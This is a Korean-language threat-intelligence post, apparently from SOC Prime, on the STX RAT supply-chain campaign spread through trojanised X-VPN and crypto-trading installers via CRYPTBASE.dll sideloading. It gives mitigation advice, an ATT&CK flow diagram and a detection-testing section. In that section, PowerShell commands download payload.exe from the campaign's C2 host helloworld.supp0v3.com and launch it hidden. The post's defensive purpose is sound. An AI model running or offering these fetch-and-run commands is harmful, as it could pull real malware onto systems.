SOC Prime Bias: 중요

09 Jun 2026 12:31 UTC
newspaper icon cyderes.com

암호화폐 지갑에서 1억 명의 VPN 사용자까지: 진행 중인 STX RAT 공급망 캠페인 내부

Author Photo
SOC Prime Team linkedin icon 팔로우
암호화폐 지갑에서 1억 명의 VPN 사용자까지: 진행 중인 STX RAT 공급망 캠페인 내부
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


요약

연구자들은 사이버 범죄자가 의심스러운 DLL 사이드로딩을 악용하여 악성 코드로 변조된 CRYPTBASE.dll 을(를) 통해 암호화폐 거래 소프트웨어 및 X-VPN 클라이언트의 변조된 설치 프로그램을 통해 STX RAT 원격 액세스 트로이 목마를 배포한 적극적인 공급망 캠페인을 발견했습니다. 이 작업은 단일 Bitbucket 저장소에 의존하여 감염된 패키지를 배포하고, 동일한 사이드로딩 방법과 일반적인 인프라를 공유하는 명령 및 제어 도메인을 통해 supp0v3.com 을 회전했습니다. 금융 거래 도구와 널리 사용되는 VPN 서비스를 모두 타겟팅하여 공격자들은 대규모로 자격 증명과 기타 민감한 데이터를 탈취할 수 있는 위치를 확보했습니다. 탐지 콘텐츠는 공유된 사이드로딩 방법과 공통 인프라를 커버하도록 업데이트되었습니다.

조사

분석가는 모든 CRYPTBASE.dll 사이드로딩 체인으로 직접 메모리에 STX RAT을 로드하는 방법을 사용한 11개의 악성 패키지를 식별했습니다. 변조된 설치 프로그램은 amos-trading이라는 이름의 Bitbucket 저장소에 호스팅되었으며, 커밋 메타데이터는 활동을 별칭 Leda Elacoate와(과) 연결시켰습니다. 공개 후 운영자는 인프라를 helloworld.supp0v3.com to 에서로 회전했습니다. YARA 분석을 통해 모든 검사 샘플에서 STX RAT이 최종 페이로드임이 확인되었습니다.

완화

X-VPN는 Windows 버전 77.5.3에서 문제를 해결했는데, 이는 시스템 디렉토리에서 DLL 로딩을 엄격히 하고, 시작 시점에 DLL 해시 유효성을 검사하며, 프로세스 별 로딩 정책을 적용합니다. 네트워크 경계에서 supp0v3.com 및 그 하위 도메인 차단은 명령 및 제어 트래픽을 방해할 수 있습니다. 조직은 또한 소프트웨어 다운로드 위생을 강화하고, 검증된 공급업체의 출처로만 설치를 제한해야 합니다.

대응

방어자는 비시스템 경로에서 CRYPTBASE.dll 로딩하는 모든 프로세스에 대해 경고를 울리고 메모리 내 STX RAT 실행의 징후를 조사해야 합니다. 게시된 STX RAT YARA 규칙은 EDR 플랫폼에 배포되어야 하며, 외부로 나가는 HTTPS 트래픽을 supp0v3.com 에 대해 면밀히 모니터링해야 합니다. 모든 엔드포인트는 패치된 X-VPN 버전으로 업데이트되거나 취약한 소프트웨어가 제거되어야 합니다. 위협 사냥은 또한 멀웨어의 다중 단계 풀기 체인과 관련된 반사 코드 로딩 행동에 초점을 맞춰야 합니다.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["<b>기술</b> – <b>T1195.002 공급망 손상: 소프트웨어 공급망 손상</b><br/><b>설명</b>: 공격자가 Bitbucket 저장소에 호스팅된 합법적인 설치 프로그램에 악성 CRYPTBASE.dll을 주입했습니다."] class tech_supply_chain technique dll_cryptbase["<b>파일</b> – <b>이름</b>: CRYPTBASE.dll (악성)"] class dll_cryptbase file file_installer["<b>파일</b> – <b>이름</b>: 트로이화된 설치 프로그램 (예: Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["<b>기술</b> – <b>T1204.002 사용자 실행: 악성 파일</b><br/><b>설명</b>: 희생자가 트로이화된 설치 프로그램을 다운로드하여 실행합니다."] class tech_user_exec technique tech_masquerade["<b>기술</b> – <b>T1036.008 가장: 파일 유형 가장</b><br/><b>설명</b>: 악성 패키지는 합법적인 VPN 또는 암호화 거래 설치 프로그램으로 제시됩니다."] class tech_masquerade technique tech_dll_hijack["<b>기술</b> – <b>T1574.001 실행 흐름 하이재킹: DLL</b><br/><b>설명</b>: 설치 프로그램이 프로그램 디렉토리에 배치된 CRYPTBASE.dll을 로드하여 합법적인 애플리케이션이 악성 DLL을 로드하도록 유도합니다."] class tech_dll_hijack technique tech_path_intercept["<b>기술</b> – <b>T1574.008 경로 가로채기: 검색 순서 하이재킹</b><br/><b>설명</b>: Windows DLL 검색 순서는 시스템 사본보다 먼저 공격자의 DLL을 로드합니다."] class tech_path_intercept technique tech_reflective["<b>기술</b> – <b>T1620 반사적 코드 로딩</b><br/><b>설명</b>: 악성 DLL은 STX RAT 페이로드를 메모리에 반사적 로딩 방식으로 풀고 주입하여 디스크에 남는 아티팩트를 남기지 않습니다."] class tech_reflective technique tech_embedded["<b>기술</b> – <b>T1027.009 임베디드 페이로드</b><br/><b>설명</b>: DLL에는 내장된 다단계 풀기 체인과 STX RAT 핵심이 포함되어 있습니다."] class tech_embedded technique malware_STX["<b>멀웨어</b> – <b>이름</b>: STX RAT<br/><b>기능</b>: 자격 증명 도난 및 데이터 유출을 제공하는 원격 접근 트로이 목마."] class malware_STX malware tech_c2["<b>기술</b> – <b>T1071.001 응용 계층 프로토콜: 웹 프로토콜</b><br/><b>설명</b>: RAT은 HTTPS를 통해 supp0v3.com의 하위 도메인과 통신합니다."] class tech_c2 technique tech_cred_browser["<b>기술</b> – <b>T1555.003 웹 브라우저에서 자격 증명</b><br/><b>설명</b>: STX RAT은 저장된 브라우저 자격 증명, 세션 토큰 및 시스템 계정 데이터를 수집합니다."] class tech_cred_browser technique tech_exfil["<b>기술</b> – <b>T1041 C2 채널을 통한 유출</b><br/><b>설명</b>: 수집된 자격 증명 및 시스템 데이터는 동일한 HTTPS C2 채널을 통해 유출됩니다."] class tech_exfil technique %% 연결 tech_supply_chain –>|주입| dll_cryptbase dll_cryptbase –>|배치된| file_installer file_installer –>|희생자가 다운로드하고 실행| tech_user_exec tech_user_exec –>|유도| tech_masquerade tech_masquerade –>|활성화| tech_dll_hijack tech_dll_hijack –>|사용| tech_path_intercept tech_path_intercept –>|허용| tech_reflective tech_reflective –>|로드| malware_STX malware_STX –>|사용| tech_embedded malware_STX –>|통신| tech_c2 malware_STX –>|수확| tech_cred_browser tech_cred_browser –>|데이터 유출을 통해| tech_exfil "

공격 흐름

시뮬레이션 실행

전제 조건: 원격 측정 및 기준선 사전 비행 검사가 완료되었어야 합니다.

합당한 이유: 이 섹션에서는 탐지 규칙을 트리거하기 위해 설계된 적대 기술(TTP)의 명확한 실행을 상세히 설명합니다. 명령과 내러티브는 반드시 식별된 TTP를 직접 반영하고 탐지 논리가 기대하는 원격 측정 데이터를 정확히 생성하는 것을 목표로 해야 합니다.

  • 공격 내러티브 및 명령:

    낮은 권한의 사용자 계정을 위협한 공격자는 PowerShell 원라이너를 사용하여 C2 서버에서 악성 페이로드를 다운로드합니다 helloworld.supp0v3.com. 이는 T1071.001 (웹 프로토콜 C2)를 활용하며 T1204.002 (사용자 실행)를 활용하는 한편, 페이로드 자체는 난독화(T1027, T1027.009)되어 합법적인 실행 파일처럼 가장됩니다(T1036.005/008). 악성 도메인에 대한 외부 연결은 방화벽 로그에 캡처되어야 하며, 이에 따라 Sigma 규칙을 가동합니다.

    # Supp0v3 C2 도메인에서 악성 페이로드 다운로드
$url = "http://helloworld.supp0v3.com/payload.exe"
$out = "$env:TEMPpayload.exe"
Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out

# 페이로드 실행 (시뮬레이션 - 실제로는 더미 파일 생성)
Start-Process -FilePath $out -WindowStyle Hidden

  • 회귀 테스트 스크립트:

    # TC-20260609-A1B2C – STX RAT C2 연결 시뮬레이션을 helloworld.supp0v3.com에 수행
try {
    # 단계 1: 더미 페이로드 준비 (실제 멀웨어 실행 방지)
    $payloadPath = "$env:TEMPpayload.exe"
    Set-Content -Path $payloadPath -Value "테스트용 더미 실행 파일입니다." -Encoding ASCII

    # 단계 2: 악성 도메인에 대한 외부 HTTP 요청 시뮬레이션
    $c2Url = "http://helloworld.supp0v3.com/payload.exe"
    Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath

    # 단계 3: 페이로드 "실행" (안전하게 실제 실행 안 함)
    Write-Host "페이로드 경로 $payloadPath에서 시뮬레이션된 실행 완료"

    Write-Host "시뮬레이션 완료 - SIEM 경고를 확인하세요."
}
catch {
    Write-Error "시뮬레이션 실패: $_"
}

  • 정리 명령:

    # 더미 페이로드 및 잔여 파일 제거
$payloadPath = "$env:TEMPpayload.exe"
if (Test-Path $payloadPath) {
    Remove-Item -Path $payloadPath -Force
    Write-Host "페이로드 파일 정리됨."
}
else {
    Write-Host "페이로드 파일이 없습니다 - 정리할 것이 없습니다."
}

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입